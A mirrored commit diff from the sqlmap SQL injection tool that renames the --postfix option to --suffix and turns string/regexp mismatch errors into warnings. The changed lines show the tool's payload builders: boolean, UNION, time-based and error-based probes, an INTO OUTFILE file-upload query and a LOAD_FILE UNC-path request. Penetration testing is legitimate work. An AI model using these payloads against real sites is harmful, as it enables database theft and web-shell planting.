mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-25 02:53:46 +03:00
Proper english (--postfix is now --suffix) and --string/--regexp does not necessarily need to match into the original response body, it might well be in the injected True condition only!
This commit is contained in:
parent
ca5125bbe0
commit
17486e472a
|
@ -213,7 +213,7 @@ Gabriel Lima <pato@bugnet.com.br>
|
|||
for reporting a couple of bugs
|
||||
|
||||
Mark Lowe <larkmowe@gmail.com>
|
||||
for reporting a bug
|
||||
for reporting a couple of bugs
|
||||
|
||||
Truong Duc Luong <luongductruong@gmail.com>
|
||||
for reporting a minor bug
|
||||
|
|
|
@ -52,15 +52,15 @@ def checkSqlInjection(place, parameter, value, parenthesis):
|
|||
randInt = randomInt()
|
||||
randStr = randomStr()
|
||||
prefix = ""
|
||||
postfix = ""
|
||||
suffix = ""
|
||||
retVal = None
|
||||
|
||||
if conf.prefix or conf.postfix:
|
||||
if conf.prefix or conf.suffix:
|
||||
if conf.prefix:
|
||||
prefix = conf.prefix
|
||||
|
||||
if conf.postfix:
|
||||
postfix = conf.postfix
|
||||
if conf.suffix:
|
||||
suffix = conf.suffix
|
||||
|
||||
for case in kb.injections.root.case:
|
||||
conf.matchRatio = None
|
||||
|
@ -68,7 +68,7 @@ def checkSqlInjection(place, parameter, value, parenthesis):
|
|||
positive = case.test.positive
|
||||
negative = case.test.negative
|
||||
|
||||
if not prefix and not postfix and case.name == "custom":
|
||||
if not prefix and not suffix and case.name == "custom":
|
||||
continue
|
||||
|
||||
infoMsg = "testing %s (%s) injection " % (case.desc, logic)
|
||||
|
@ -116,16 +116,16 @@ def heuristicCheckSqlInjection(place, parameter, value):
|
|||
return
|
||||
|
||||
prefix = ""
|
||||
postfix = ""
|
||||
suffix = ""
|
||||
|
||||
if conf.prefix or conf.postfix:
|
||||
if conf.prefix or conf.suffix:
|
||||
if conf.prefix:
|
||||
prefix = conf.prefix
|
||||
|
||||
if conf.postfix:
|
||||
postfix = conf.postfix
|
||||
if conf.suffix:
|
||||
suffix = conf.suffix
|
||||
|
||||
payload = "%s%s%s%s" % (value, prefix, randomStr(length=10, alphabet=['"', '\'', ')', '(']), postfix)
|
||||
payload = "%s%s%s%s" % (value, prefix, randomStr(length=10, alphabet=['"', '\'', ')', '(']), suffix)
|
||||
payload = agent.payload(place, parameter, value, payload)
|
||||
Request.queryPage(payload, place, raise404=False)
|
||||
result = wasLastRequestDBMSError()
|
||||
|
@ -209,15 +209,15 @@ def checkDynamicContent(firstPage, secondPage):
|
|||
|
||||
for i in xrange(len(blocks) - 1):
|
||||
prefix = firstPage[blocks[i][0]:blocks[i][0] + blocks[i][2]] if blocks[i] else None
|
||||
postfix = firstPage[blocks[i + 1][0]:blocks[i + 1][0] + blocks[i + 1][2]] if blocks[i + 1] else None
|
||||
suffix = firstPage[blocks[i + 1][0]:blocks[i + 1][0] + blocks[i + 1][2]] if blocks[i + 1] else None
|
||||
|
||||
if prefix is None and blocks[i + 1][0] == 0:
|
||||
continue
|
||||
|
||||
if postfix is None and (blocks[i][0] + blocks[i][2] >= len(firstPage)):
|
||||
if suffix is None and (blocks[i][0] + blocks[i][2] >= len(firstPage)):
|
||||
continue
|
||||
|
||||
kb.dynamicMarkings.append((re.escape(prefix[-conf.dynMarkLength:]) if prefix else None, re.escape(postfix[:conf.dynMarkLength]) if postfix else None))
|
||||
kb.dynamicMarkings.append((re.escape(prefix[-conf.dynMarkLength:]) if prefix else None, re.escape(suffix[:conf.dynMarkLength]) if suffix else None))
|
||||
|
||||
if len(kb.dynamicMarkings) > 0:
|
||||
infoMsg = "dynamic content marked for removal (%d region%s)" % (len(kb.dynamicMarkings), 's' if len(kb.dynamicMarkings) > 1 else '')
|
||||
|
@ -225,14 +225,14 @@ def checkDynamicContent(firstPage, secondPage):
|
|||
|
||||
if conf.seqMatcher.a:
|
||||
for item in kb.dynamicMarkings:
|
||||
prefix, postfix = item
|
||||
prefix, suffix = item
|
||||
|
||||
if prefix is None:
|
||||
conf.seqMatcher.a = re.sub('(?s)^.+%s' % postfix, postfix, conf.seqMatcher.a)
|
||||
elif postfix is None:
|
||||
conf.seqMatcher.a = re.sub('(?s)^.+%s' % suffix, suffix, conf.seqMatcher.a)
|
||||
elif suffix is None:
|
||||
conf.seqMatcher.a = re.sub('(?s)%s.+$' % prefix, prefix, conf.seqMatcher.a)
|
||||
else:
|
||||
conf.seqMatcher.a = re.sub('(?s)%s.+%s' % (prefix, postfix), '%s%s' % (prefix, postfix), conf.seqMatcher.a)
|
||||
conf.seqMatcher.a = re.sub('(?s)%s.+%s' % (prefix, suffix), '%s%s' % (prefix, suffix), conf.seqMatcher.a)
|
||||
|
||||
def checkStability():
|
||||
"""
|
||||
|
@ -347,14 +347,14 @@ def checkString():
|
|||
|
||||
if conf.string in page:
|
||||
setString()
|
||||
return True
|
||||
else:
|
||||
errMsg = "you provided '%s' as the string to " % conf.string
|
||||
errMsg += "match, but such a string is not within the target "
|
||||
errMsg += "URL page content, please provide another string."
|
||||
logger.error(errMsg)
|
||||
warnMsg = "you provided '%s' as the string to " % conf.string
|
||||
warnMsg += "match, but such a string is not within the target "
|
||||
warnMsg += "URL page content original request, sqlmap will "
|
||||
warnMsg += "keep going anyway"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
return False
|
||||
return True
|
||||
|
||||
def checkRegexp():
|
||||
if not conf.regexp:
|
||||
|
@ -377,15 +377,14 @@ def checkRegexp():
|
|||
|
||||
if re.search(conf.regexp, page, re.I | re.M):
|
||||
setRegexp()
|
||||
return True
|
||||
else:
|
||||
errMsg = "you provided '%s' as the regular expression to " % conf.regexp
|
||||
errMsg += "match, but such a regular expression does not have any "
|
||||
errMsg += "match within the target URL page content, please provide "
|
||||
errMsg += "another regular expression."
|
||||
logger.error(errMsg)
|
||||
warnMsg = "you provided '%s' as the regular expression to " % conf.regexp
|
||||
warnMsg += "match, but such a regular expression does not have any "
|
||||
warnMsg += "match within the target URL page content, sqlmap "
|
||||
warnMsg += "will keep going anyway"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
return False
|
||||
return True
|
||||
|
||||
def checkNullConnection():
|
||||
"""
|
||||
|
|
|
@ -120,7 +120,7 @@ class Agent:
|
|||
return self.payloadDirect(query)
|
||||
|
||||
query = self.prefixQuery(query)
|
||||
query = self.postfixQuery(query)
|
||||
query = self.suffixQuery(query)
|
||||
payload = self.payload(newValue=query)
|
||||
|
||||
return payload
|
||||
|
@ -156,7 +156,7 @@ class Agent:
|
|||
|
||||
return query
|
||||
|
||||
def postfixQuery(self, string, comment=None):
|
||||
def suffixQuery(self, string, comment=None):
|
||||
"""
|
||||
This method appends the DBMS comment to the
|
||||
SQL injection request
|
||||
|
@ -182,10 +182,10 @@ class Agent:
|
|||
if comment:
|
||||
string += comment
|
||||
|
||||
if conf.postfix:
|
||||
string += " %s" % conf.postfix
|
||||
if conf.suffix:
|
||||
string += " %s" % conf.suffix
|
||||
else:
|
||||
string += case.usage.postfix.format % eval(case.usage.postfix.params)
|
||||
string += case.usage.suffix.format % eval(case.usage.suffix.params)
|
||||
|
||||
return string
|
||||
|
||||
|
@ -499,7 +499,7 @@ class Agent:
|
|||
if intoRegExp:
|
||||
inbandQuery += intoRegExp
|
||||
|
||||
inbandQuery = self.postfixQuery(inbandQuery, kb.unionComment)
|
||||
inbandQuery = self.suffixQuery(inbandQuery, kb.unionComment)
|
||||
|
||||
return inbandQuery
|
||||
|
||||
|
@ -636,7 +636,7 @@ class Agent:
|
|||
regObj = getCompiledRegex("(?P<result>%s.*?%s)" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER))
|
||||
|
||||
for match in regObj.finditer(inpStr):
|
||||
retVal = retVal.replace(match.group("result"), urlencode(match.group("result").strip(PAYLOAD_DELIMITER), convall=True))
|
||||
retVal = retVal.replace(match.group("result"), match.group("result").strip(PAYLOAD_DELIMITER))
|
||||
else:
|
||||
retVal = retVal.replace(PAYLOAD_DELIMITER, '')
|
||||
|
||||
|
|
|
@ -58,7 +58,7 @@ optDict = {
|
|||
"dbms": "string",
|
||||
"os": "string",
|
||||
"prefix": "string",
|
||||
"postfix": "string",
|
||||
"suffix": "string",
|
||||
"tamper": "string"
|
||||
},
|
||||
|
||||
|
|
|
@ -169,8 +169,8 @@ def cmdLineParser():
|
|||
injection.add_option("--prefix", dest="prefix",
|
||||
help="Injection payload prefix string")
|
||||
|
||||
injection.add_option("--postfix", dest="postfix",
|
||||
help="Injection payload postfix string")
|
||||
injection.add_option("--suffix", dest="suffix",
|
||||
help="Injection payload suffix string")
|
||||
|
||||
injection.add_option("--tamper", dest="tamper",
|
||||
help="Use given script(s) for tampering injection data")
|
||||
|
|
|
@ -60,14 +60,14 @@ def comparison(page, headers=None, getSeqMatcher=False, pageLength=None):
|
|||
# Dynamic content lines to be excluded before comparison
|
||||
if not kb.nullConnection and not conf.longestCommon:
|
||||
for item in kb.dynamicMarkings:
|
||||
prefix, postfix = item
|
||||
prefix, suffix = item
|
||||
|
||||
if prefix is None:
|
||||
page = re.sub('(?s)^.+%s' % postfix, postfix, page)
|
||||
elif postfix is None:
|
||||
page = re.sub('(?s)^.+%s' % suffix, suffix, page)
|
||||
elif suffix is None:
|
||||
page = re.sub('(?s)%s.+$' % prefix, prefix, page)
|
||||
else:
|
||||
page = re.sub('(?s)%s.+%s' % (prefix, postfix), '%s%s' % (prefix, postfix), page)
|
||||
page = re.sub('(?s)%s.+%s' % (prefix, suffix), '%s%s' % (prefix, suffix), page)
|
||||
|
||||
if not pageLength:
|
||||
pageLength = len(page)
|
||||
|
|
|
@ -99,7 +99,7 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r
|
|||
"""
|
||||
|
||||
query = agent.prefixQuery(queries[kb.misc.testedDbms].inference.query)
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
payload = agent.payload(newValue=query)
|
||||
count = None
|
||||
startLimit = 0
|
||||
|
@ -398,7 +398,7 @@ def goStacked(expression, silent=False):
|
|||
|
||||
comment = queries[kb.dbms].comment.query
|
||||
query = agent.prefixQuery("; %s" % expression)
|
||||
query = agent.postfixQuery("%s;%s" % (query, comment))
|
||||
query = agent.suffixQuery("%s;%s" % (query, comment))
|
||||
|
||||
debugMsg = "query: %s" % query
|
||||
logger.debug(debugMsg)
|
||||
|
|
|
@ -99,7 +99,7 @@ class Web:
|
|||
query = "LIMIT 1 INTO OUTFILE '%s' " % outFile
|
||||
query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
|
||||
query = agent.prefixQuery(query)
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
payload = agent.payload(newValue=query)
|
||||
page = Request.queryPage(payload)
|
||||
return page
|
||||
|
|
|
@ -442,7 +442,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
|||
# One-shot query containing equals commonValue
|
||||
testValue = unescaper.unescape("'%s'" % commonValue) if "'" not in commonValue else unescaper.unescape("%s" % commonValue, quote=False)
|
||||
query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (expressionUnescaped, testValue)))
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
queriesCount[0] += 1
|
||||
result = Request.queryPage(agent.payload(newValue=query))
|
||||
|
||||
|
@ -466,7 +466,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
|||
subquery = queries[kb.dbms].substring.query % (expressionUnescaped, 1, len(commonPattern))
|
||||
testValue = unescaper.unescape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.unescape("%s" % commonPattern, quote=False)
|
||||
query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (subquery, testValue)))
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
queriesCount[0] += 1
|
||||
result = Request.queryPage(agent.payload(newValue=query))
|
||||
|
||||
|
|
|
@ -28,7 +28,7 @@ def timeTest():
|
|||
|
||||
timeQuery = getDelayQuery(andCond=True)
|
||||
query = agent.prefixQuery("AND %s" % timeQuery)
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
payload = agent.payload(newValue=query)
|
||||
start = time.time()
|
||||
_ = Request.queryPage(payload)
|
||||
|
|
|
@ -38,7 +38,7 @@ def tableExists(tableFile):
|
|||
if conf.db and '(*)' not in conf.db:
|
||||
table = "%s.%s" % (conf.db, table)
|
||||
query = agent.prefixQuery("%s" % safeStringFormat("AND EXISTS(SELECT %d FROM %s)", (randomInt(1), table)))
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
result = Request.queryPage(agent.payload(newValue=query))
|
||||
|
||||
if result:
|
||||
|
@ -89,7 +89,7 @@ def columnExists(columnFile):
|
|||
|
||||
for column in columns:
|
||||
query = agent.prefixQuery("%s" % safeStringFormat("AND EXISTS(SELECT %s FROM %s)", (column, table)))
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
result = Request.queryPage(agent.payload(newValue=query))
|
||||
|
||||
if result:
|
||||
|
@ -114,7 +114,7 @@ def columnExists(columnFile):
|
|||
|
||||
for column in retVal:
|
||||
query = agent.prefixQuery("%s" % safeStringFormat("AND EXISTS(SELECT %s FROM %s WHERE %s>0)", (column, table, column)))
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
result = Request.queryPage(agent.payload(newValue=query))
|
||||
|
||||
if result:
|
||||
|
|
|
@ -40,7 +40,7 @@ def errorUse(expression, returnPayload=False):
|
|||
logic = conf.logic
|
||||
randInt = randomInt(1)
|
||||
query = agent.prefixQuery(queries[kb.misc.testedDbms].error.query)
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
startLimiter = ""
|
||||
endLimiter = ""
|
||||
|
||||
|
|
|
@ -128,7 +128,7 @@ def __unionTestByNULLBruteforce(comment, negative=False, falseCond=False):
|
|||
if kb.dbms == DBMS.ORACLE:
|
||||
query += " FROM DUAL"
|
||||
|
||||
commentedQuery = agent.postfixQuery(query, comment)
|
||||
commentedQuery = agent.suffixQuery(query, comment)
|
||||
payload = agent.payload(newValue=commentedQuery, negative=negative, falseCond=falseCond)
|
||||
test, seqMatcher = Request.queryPage(payload, getSeqMatcher=True)
|
||||
|
||||
|
@ -145,7 +145,7 @@ def __unionTestByOrderBy(comment, negative=False, falseCond=False):
|
|||
|
||||
for count in range(1, conf.uCols+2):
|
||||
query = agent.prefixQuery("ORDER BY %d" % count)
|
||||
orderByQuery = agent.postfixQuery(query, comment)
|
||||
orderByQuery = agent.suffixQuery(query, comment)
|
||||
payload = agent.payload(newValue=orderByQuery, negative=negative, falseCond=falseCond)
|
||||
_, seqMatcher = Request.queryPage(payload, getSeqMatcher=True)
|
||||
|
||||
|
|
|
@ -37,7 +37,7 @@ def checkForParenthesis():
|
|||
if kb.parenthesis is not None:
|
||||
return
|
||||
|
||||
if conf.prefix or conf.postfix:
|
||||
if conf.prefix or conf.suffix:
|
||||
kb.parenthesis = 0
|
||||
return
|
||||
|
||||
|
@ -46,7 +46,7 @@ def checkForParenthesis():
|
|||
randStr = randomStr()
|
||||
|
||||
query = case.usage.prefix.format % eval(case.usage.prefix.params)
|
||||
query = query[:-1] + case.usage.postfix.format % eval(case.usage.postfix.params)
|
||||
query = query[:-1] + case.usage.suffix.format % eval(case.usage.suffix.params)
|
||||
|
||||
payload = agent.payload(newValue=query)
|
||||
result = Request.queryPage(payload)
|
||||
|
|
|
@ -41,7 +41,7 @@ class Fingerprint(GenericFingerprint):
|
|||
table = "MSysAccessStorage"
|
||||
if table:
|
||||
query = agent.prefixQuery("AND EXISTS(SELECT CURDIR() FROM %s)" % table)
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
payload = agent.payload(newValue=query)
|
||||
result = Request.queryPage(payload)
|
||||
retVal = "not sandboxed" if result else "sandboxed"
|
||||
|
@ -71,7 +71,7 @@ class Fingerprint(GenericFingerprint):
|
|||
table = table[1:]
|
||||
randInt = randomInt()
|
||||
query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s WHERE %d=%d)" % (table, randInt, randInt))
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
payload = agent.payload(newValue=query)
|
||||
result = Request.queryPage(payload)
|
||||
if result is None:
|
||||
|
@ -95,7 +95,7 @@ class Fingerprint(GenericFingerprint):
|
|||
randInt = randomInt()
|
||||
randStr = randomStr()
|
||||
query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s.%s WHERE %d=%d)" % (randStr, randStr, randInt, randInt))
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
payload = agent.payload(newValue=query)
|
||||
page = Request.queryPage(payload, content=True)
|
||||
|
||||
|
|
|
@ -35,7 +35,7 @@ class Fingerprint(GenericFingerprint):
|
|||
logger.info(infoMsg)
|
||||
|
||||
query = agent.prefixQuery("/* NoValue */")
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
payload = agent.payload(newValue=query)
|
||||
result = Request.queryPage(payload)
|
||||
|
||||
|
@ -49,7 +49,7 @@ class Fingerprint(GenericFingerprint):
|
|||
|
||||
for version in [6, 7]:
|
||||
query = agent.prefixQuery("AND (SELECT MAJORVERSION FROM SYSINFO.VERSION)=%d" % version)
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
payload = agent.payload(newValue=query)
|
||||
result = Request.queryPage(payload)
|
||||
|
||||
|
@ -58,7 +58,7 @@ class Fingerprint(GenericFingerprint):
|
|||
|
||||
for version in xrange(0, 10):
|
||||
query = agent.prefixQuery("AND (SELECT MINORVERSION FROM SYSINFO.VERSION)=%d" % version)
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
payload = agent.payload(newValue=query)
|
||||
result = Request.queryPage(payload)
|
||||
|
||||
|
|
|
@ -36,7 +36,7 @@ class Fingerprint(GenericFingerprint):
|
|||
logger.info(infoMsg)
|
||||
|
||||
query = agent.prefixQuery("/* NoValue */")
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
payload = agent.payload(newValue=query)
|
||||
result = Request.queryPage(payload)
|
||||
|
||||
|
@ -66,7 +66,7 @@ class Fingerprint(GenericFingerprint):
|
|||
randInt = randomInt()
|
||||
version = getUnicode(version)
|
||||
query = agent.prefixQuery("/*!%s AND %d=%d*/" % (version, randInt, randInt + 1))
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
payload = agent.payload(newValue=query)
|
||||
result = Request.queryPage(payload)
|
||||
|
||||
|
|
|
@ -102,7 +102,7 @@ class Takeover(GenericTakeover):
|
|||
def uncPathRequest(self):
|
||||
if not kb.stackedTest:
|
||||
query = agent.prefixQuery("AND LOAD_FILE('%s')" % self.uncPath)
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
payload = agent.payload(newValue=query)
|
||||
|
||||
Request.queryPage(payload)
|
||||
|
|
|
@ -181,8 +181,8 @@ os =
|
|||
# Injection payload prefix string
|
||||
prefix =
|
||||
|
||||
# Injection payload postfix string
|
||||
postfix =
|
||||
# Injection payload suffix string
|
||||
suffix =
|
||||
|
||||
# Use given script(s) for tampering injection data
|
||||
tamper =
|
||||
|
|
|
@ -3,12 +3,12 @@
|
|||
<root>
|
||||
<case name="custom" desc="custom">
|
||||
<test>
|
||||
<positive format="%s%s%s %s %s%d=%d %s" params="value, prefix, ")" * parenthesis, logic, "(" * parenthesis, randInt, randInt, postfix"/>
|
||||
<negative format="%s%s%s %s %s%d=%d %s" params="value, prefix, ")" * parenthesis, logic, "(" * parenthesis, randInt, randInt + 1, postfix"/>
|
||||
<positive format="%s%s%s %s %s%d=%d %s" params="value, prefix, ")" * parenthesis, logic, "(" * parenthesis, randInt, randInt, suffix"/>
|
||||
<negative format="%s%s%s %s %s%d=%d %s" params="value, prefix, ")" * parenthesis, logic, "(" * parenthesis, randInt, randInt + 1, suffix"/>
|
||||
</test>
|
||||
<usage>
|
||||
<prefix format="%s " params="')' * parenthesis"/>
|
||||
<postfix format=" %s %s" params="logic, '(' * parenthesis"/>
|
||||
<suffix format=" %s %s" params="logic, '(' * parenthesis"/>
|
||||
</usage>
|
||||
</case>
|
||||
<case name="numeric" desc="unescaped numeric">
|
||||
|
@ -18,7 +18,7 @@
|
|||
</test>
|
||||
<usage>
|
||||
<prefix format="%s " params="')' * parenthesis"/>
|
||||
<postfix format=" %s %s%d=%d" params="logic, '(' * parenthesis, randInt, randInt"/>
|
||||
<suffix format=" %s %s%d=%d" params="logic, '(' * parenthesis, randInt, randInt"/>
|
||||
</usage>
|
||||
</case>
|
||||
<case name="stringsingle" desc="single quoted string">
|
||||
|
@ -28,7 +28,7 @@
|
|||
</test>
|
||||
<usage>
|
||||
<prefix format="'%s " params="')' * parenthesis"/>
|
||||
<postfix format=" %s %s'%s'='%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
||||
<suffix format=" %s %s'%s'='%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
||||
</usage>
|
||||
</case>
|
||||
<case name="likesingle" desc="LIKE single quoted string">
|
||||
|
@ -38,7 +38,7 @@
|
|||
</test>
|
||||
<usage>
|
||||
<prefix format="'%s " params="')' * parenthesis"/>
|
||||
<postfix format=" %s %s'%s' LIKE '%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
||||
<suffix format=" %s %s'%s' LIKE '%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
||||
</usage>
|
||||
</case>
|
||||
<case name="stringdouble" desc="double quoted string">
|
||||
|
@ -48,7 +48,7 @@
|
|||
</test>
|
||||
<usage>
|
||||
<prefix format=""%s " params="')' * parenthesis"/>
|
||||
<postfix format=" %s %s"%s"="%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
||||
<suffix format=" %s %s"%s"="%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
||||
</usage>
|
||||
</case>
|
||||
<case name="likedouble" desc="LIKE double quoted string">
|
||||
|
@ -58,7 +58,7 @@
|
|||
</test>
|
||||
<usage>
|
||||
<prefix format=""%s " params="')' * parenthesis"/>
|
||||
<postfix format=" %s %s"%s" LIKE "%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
||||
<suffix format=" %s %s"%s" LIKE "%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
||||
</usage>
|
||||
</case>
|
||||
</root>
|
||||
|
|
Loading…
Reference in New Issue
Block a user